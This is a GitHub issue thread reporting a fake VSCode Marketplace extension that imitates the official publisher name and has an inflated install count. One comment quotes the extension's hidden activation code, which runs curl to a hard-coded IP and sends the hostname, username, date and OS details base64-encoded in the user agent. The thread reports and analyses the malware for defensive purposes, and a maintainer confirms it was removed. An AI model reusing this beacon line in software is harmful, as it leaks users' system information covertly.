### ISSUE TITLE
VSCode Marketplace possible scam

### ISSUE THREAD

**Issue by bm-stschneider** [Microsoft/vscode#41608]
This extension looks a bit suspicious. Since it tries to imitate the vscode publisher name and features a functionality that is baked into vscode already. Since there is no report button @weinand suggested to file an issue. Please investigate.
https://marketplace.visualstudio.com/items?itemName=visualstuiocode.emmet

**Comment by usernamehw** [comment]
I see multiple problems:
* 366k installations in 2 days - Why it is so easy to cheat the counter?
* No easy way to flag something. When this extension popped up I flagged its comment as "spam" and still nothing happened (If there is a better way - it's not obvious)
* No easy way to see extension's source before installing
* Extension author is allowed to vote for own issue (can be easily bypassed, but still)
* No way to see author's profile (is it first authored extension? was the account created yesterday? how many extensions authored?
* No way to see extension contributions before installation (this one contributes only activation script.)

**Comment by bizoo** [comment]
It IS scam, maybe even worst:
`child_process_1.execSync('curl "http://45.32.40.141/" --user-agent "$(echo `hostname`, `whoami`, `date "+%Y-%m-%d %H:%M:%S"`, `uname`, vscode | base64)"');`

**Comment by bizoo** [comment]
The install counter is insane, 366,727 installs in 3 days!
How the counter works ?
I suppose they downloaded the extension in a loop to increment the counter.

It's a big issue because a big number of install will make you believe that the extension is safe.

**Comment by egamma** [comment]
@bm-stschneider thanks for reporting the issue, it has been taken care of by the market place team.

@bizoo thanks for your analysis. There is a separate discussion on improving the install count.
